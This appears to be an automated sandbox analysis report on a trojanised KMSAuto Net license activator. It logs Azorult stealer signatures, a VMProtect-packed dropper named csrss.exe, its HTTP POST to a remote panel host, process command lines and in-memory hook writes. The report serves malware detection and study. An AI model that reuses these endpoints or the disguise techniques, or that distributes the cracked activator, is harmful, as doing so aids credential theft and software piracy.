              Source: csrss.exe, 00000001.00000003.255564669.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.274376515.0000000002E0C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255583166.0000000002E08000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru
              Source: csrss.exe, 00000001.00000003.255564669.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.274376515.0000000002E0C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255583166.0000000002E08000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru/customer/ips/list
              Source: csrss.exe, csrss.exe, 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmpString found in binary or memory: https://dotbit.me/a/
              Source: csrss.exe, 00000001.00000003.255564669.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255546682.0000000002E1C000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255583166.0000000002E08000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.274427424.0000000002E00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255405907.0000000002E04000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000001.00000003.255463802.0000000002E0C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://index.from.sh/pages/game.html
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: https://keepass.info/
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: https://keepass.info/1020KMSAuto
              Source: unknownHTTP traffic detected: POST /Panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: f0355889.xsph.ruContent-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 48 ed 3e 3e ed 3e 32 ed 3e 3d ed 3e 3d ed 3e 33 89 28 38 8c 28 39 fa 28 39 f8 28 39 f1 28 39 f1 4f 2f fb 3d 4e ed 3e 3a ed 3e 3c Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KH>>>2>=>=>3(8(9(9(9(9O/=N>:><
              Source: unknownDNS traffic detected: queries for: f0355889.xsph.ru

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
              Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
              Detected VMProtect packer
              Source: csrss.exe.0.drStatic PE information: .vmp0 and .vmp1 section names
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_csrss.exe_f22660799b81b1cdf575f7ba80bebda2d012813c_4666b2e0_0a75e935\Report.wer, type: DROPPEDMatched rule: SUSP_WER_Suspicious_Crash_Directory date = 2019-10-18, author = Florian Roth (Nextron Systems), description = Detects a crashed application executed in a suspicious directory, score = , reference = https://twitter.com/cyb3rops/status/1185585050059976705
              Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1136
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C35970_3_046C3597
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046BF8FF0_3_046BF8FF
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C2FE70_3_046C2FE7
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C502A0_3_046C502A
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C10870_3_046C1087
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C48870_3_046C4887
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C39470_3_046C3947
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C31E70_3_046C31E7
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C51B70_3_046C51B7
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C52920_3_046C5292
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C3B070_3_046C3B07
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeCode function: 2_2_0125DE972_2_0125DE97
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeCode function: 2_2_0125C1902_2_0125C190
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeCode function: 2_2_012598702_2_01259870
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeCode function: 2_2_05136FC02_2_05136FC0
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeBinary or memory string: OriginalFilename vs ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002214000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKMSAuto Net.exe8 vs ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename7z.sfx.exe, vs ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameKMSAuto Net.exe8 vs ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeReversingLabs: Detection: 56%
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeVirustotal: Detection: 44%
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeFile read: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" /nc /s
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess created: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe "C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /nc
              Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 1136
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md "C:\Users\user\AppData\Local\MSfree Inc"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo test>>"C:\Program Files (x86)\KMSAuto\KMSAuto Net\test.test"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" /nc /sJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess created: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe "C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /ncJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md "C:\Users\user\AppData\Local\MSfree Inc"Jump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo test>>"C:\Program Files (x86)\KMSAuto\KMSAuto Net\test.test"Jump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"Jump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeFile created: C:\Users\user\AppData\Local\Temp\$instJump to behavior
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/12@1/1
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_01
              Source: C:\Users\user\AppData\Roaming\csrss.exeMutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FB48779A-2099B0D06
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_01
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5224
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeFile created: C:\Program Files (x86)\KMSAutoJump to behavior
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: ltiples versiones del programa. Ratiborus Changelog: v1.4.9 -Added Keys for Windows Server 2016 Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Win
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: a GVLK forcibly. -Added option to disable Task Scheduler which monitor user actions. v1.2.4.1 -Fixed bug when working with command line parameters creating a scheduled task. v1.2.4 -Activating in Auto mode starts using Windivert method. -In the
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: and makes it possible to remove them. v1.3.1.b3 -Added function for switching language interface. v1.3.1.b2 -Fixed bug when working with command line parameters creating a scheduled task. v1.3.1.b1 -Added support to activate Windows Technical P
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: eview, Windows 10. v1.3.0 -Added support to activate OEM editions: "Windows 8.1 Single Language with Bing", "Windows 8.1 with Bing" and "Windows 8.1 Pro for Education" v1.2.8 -ProduKey program updated from v1.65 to v1.66. -Replaced SppPatcher
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: Carefully read the message that appears when you click on this button! v1.1.6 -Added the ability to reset the program to default values. -New containers for modules. Unpacking modules and drivers is faster. -Task scheduler creates tasks on behalf of t
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: AP method the TAP adapter is not re-installed. v1.2.3 -Activation functions are optimized for Windows and Office. -Fixed minor bugs. -Changed the "Utilities" tab. Added "KMS Client by Hotbird64" -New KMSSS.exe supporting installation Hwid KMS-Serve
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: . v1.2.2 -Fixed date and time displayed in hexadecimal format in the log file. v1.2.1 -Added the utility from ShowHideControls miXOnIN. To convert Systems Editions. -In Professional Mode, Advanced tab, the button "Convert Office RETAIL to VL".
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: Runs on Windows 8-8.1, doesn't work on Windows 7!. -New KMSSS.exe supporting installation Hwid KMS-Server. v1.2.0 -Changed the "Settings" tab. v1.1.9.b1 -Updated program for ProduKey v1.62 v1.65 -Added the choice of Activation intervals of 10
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: nd 20 days. -Installing GVLK Key at "Utilities" tab, works through slmgr.vbs. -Changed setting keys function for "Unsupported Product" (so reports WMI OS). -Added the program KMS Log Analyzer, for easy viewing and conservation of information of the lo
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: nd 20 days. -Installing GVLK Key at "Utilities" tab, works through slmgr.vbs. -Changed setting keys function for "Unsupported Product" (so reports WMI OS). -Added the program KMS Log Analyzer, for easy viewing and conservation of information of the lo
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: of local host activation is excluded. -Added a second type of TAP adapter to resolve the conflict with the already established TAP VPN. -WinDivert v1.1 has been applied, so not "incidents" result in BSOD on x86 systems. -Eliminate errors when in the file
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: ng files. -Added option in the task scheduler to create the task in the ProgramData\KMSAutoS path. v1.1.1 -Added activation method with temporary substitution of 8.1 files. v1.0.9.1 -Eliminating annoying bug with non-removed service TunMirror. v
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: s :) v1.0.3 -Applied a modified KMS-Service. Allows for the use of each product your own ePID. Including CSVLK from actual key. -Changed the installation and removal of TunMirror. -Changed the installation and removal of TAP interface. -Added s
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: dows Server 2016 Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Windows Server 2016. v1.4.7 -New KMS-Service. v1.4.6 -Added Keys for Windows 10 and Office 2016. v1.4.5 -Fixed minor bugs. v1.4.4 -Small changes in progra
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: pport for activation of Core, Embedded Industry, Single Language, etc. v1.0.2 -Change the setting of TAP interface. -New feature for activation Backup / Restore. -Cosmetic changes to the interface. -Added the ability to create a task scheduler to ac
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: path a sign "&" (ampersand) is present. v1.0.8 -Added a setting to remove the WinDivert driver. To avoid a possible crashing of your system in a BSOD, the unconditional removal can be turned on. By default, the removal is made after reboot. -Adde
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: Evgeny972 et les personnes du forum.ru-board.com, pour l'assitance et les tests des multiples versions du programme. Journal des modifications : v1.4.9 -Added Keys for Wi
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: Office 2016 Mondo. v1.3.9 -Conversion from Office 2016 Word, Excel, Access, OneNote, OutLook, PowerPoint, Publisher RETAIL to VL. v1.3.8 -Fixed: mapping display buttons when the font is enlarged to 125%. -Added: Display the license expiration d
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: nh. Ratiborus Changelog: v1.4.9 -Added Keys for Windows Server 2016 Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Windows Server 2016.
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: te (180 days 0 hours 0 minutes). -Added in "Other utilities" restore system files from the disk with your version/edition of Windows. v1.3.7 -Fixed: Encoding readme_ru.txt. -Added readme.txt in the Bulgarian language. -Utility to save activati
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: -Changes in program for compatibility with antivirus software. v1.4.0 -Added: Conversion from Office 2016 Mondo. v1.3.9 -Conversion from Office 2016 Word, Excel, Access, OneNote, OutLook, PowerPoint, Publisher RETAIL to VL. v1.3.8 -Fixed: map
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: m.ru-board.com for making possible assistance and testing of multiple versions of the program. Ratiborus Changelog: v1.4.9 -Added Keys for Windows Server 201
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: ing display buttons when the font is enlarged to 125%. -Added: Display the license expiration date (180 days 0 hours 0 minutes). -Added in "Other utilities" restore system files from the disk with your version/edition of Windows. v1.3.7 -Fixed:
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: Ratiborus v1.4.9 -Added Keys for Windows Server 2016 Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Windows Server 2016. v1.4.7 -New KMS-Service. v1.4.6 -Added Keys for Windows
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: lse positive. -Included utility MSActBackUp. -Added Keys for Windows 10 and Office 2016. -Conversion from Office 2016 RETAIL to VL. -If Office is not installed, the button "Activate Office" is disabled. -In the "About" tab you can find a link to a pa
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: -Hook method uses a modified SECO Injector. Works at Activation and Renewal intervals and set own ePID. v1.1.2b2 -Option to connect to the KMS server where Hook mode works without replacing files. -Added option in the task scheduler to create the t
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: -Small changes to the interface, added compatibility with Windows Technical Preview. -Now the program has French interface, thanks to coleo. v1.3.1.b4 -Added function that runs the script from heos(ru-board.com). This script searches for installed
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Windows Server 2016. v1.4.7 -New KMS-Service. v1.4.6 -Added Keys for Windows 10 and Office 2016. v1.4.5 -Fixed minor bugs. v1.4.4 -Small changes in program code. v1.4.
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: . A random IP address is used and when the activation fails check box is cleared. -Re-compiled KMS Service. So antivirus software will not detect it as threat/false positive. -Included utility MSActBackUp. -Added Keys for Windows 10 and Office 2016. -C
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: ncoding readme_ru.txt. -Added readme.txt in the Bulgarian language. -Utility to save activation MSActBackUp v1.0.8. v1.3.6 -Updated program ProduKey v1.70 to v1.80. -Fixed: Setting keys for Office 2016. -Fixed: The task in the scheduler runs eve
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: nversion from Office 2016 RETAIL to VL. -If Office is not installed, the button "Activate Office" is disabled. -In the "About" tab you can find a link to a page with my programs. -Added program for Windows 10 "Show or hide updates" v1.3.2 -Small cha
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeString found in binary or memory: e positive. -Included utility MSActBackUp. -Added Keys for Windows 10 and Office 2016. -Conversion from Office 2016 RETAIL to VL. -If Office is not installed, the button "Activate Office" is disabled. -In the "About" tab you can find a link to a page
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeFile written: C:\Users\user\AppData\Local\MSfree Inc\kmsauto.iniJump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeFile opened: C:\Windows\SysWOW64\msftedit.DLLJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeStatic file information: File size 8425933 > 1048576
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_0227D2BB push eax; retf 0_3_0227D3A2
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046BFC87 push ecx; mov dword ptr [esp], ecx0_3_046BFC88
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046B2E71 push eax; ret 0_3_046B2E7B
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeCode function: 0_3_046C4987 push eax; ret 0_3_046C49A5
              Source: C:\Users\user\AppData\Roaming\csrss.exeCode function: 1_2_008A67D7 push ebp; ret 1_2_008A686A
              Source: csrss.exe.0.drStatic PE information: section name: .vmp0
              Source: csrss.exe.0.drStatic PE information: section name: .vmp1
              Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
              Source: csrss.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x4cfa3d
              Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeStatic PE information: real checksum: 0x40637 should be: 0x81749e

              Persistence and Installation Behavior

              barindex
              Drops PE files with benign system names
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeFile created: C:\Users\user\AppData\Roaming\csrss.exeJump to dropped file
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeFile created: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Overwrites code with unconditional jumps - possibly settings hooks in foreign process
              Source: C:\Users\user\AppData\Roaming\csrss.exeMemory written: PID: 5224 base: 2AF0005 value: E9 FB 99 DF 74 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeMemory written: PID: 5224 base: 778E9A00 value: E9 0A 66 20 8B Jump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeMemory written: PID: 5224 base: 2B00007 value: E9 7B 4C E2 74 Jump to behavior
              Source: C:\Users\user\AppData\Roaming\csrss.exeMemory written: PID: 5224 base: 77924C80 value: E9 8E B3 1D 8B Jump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
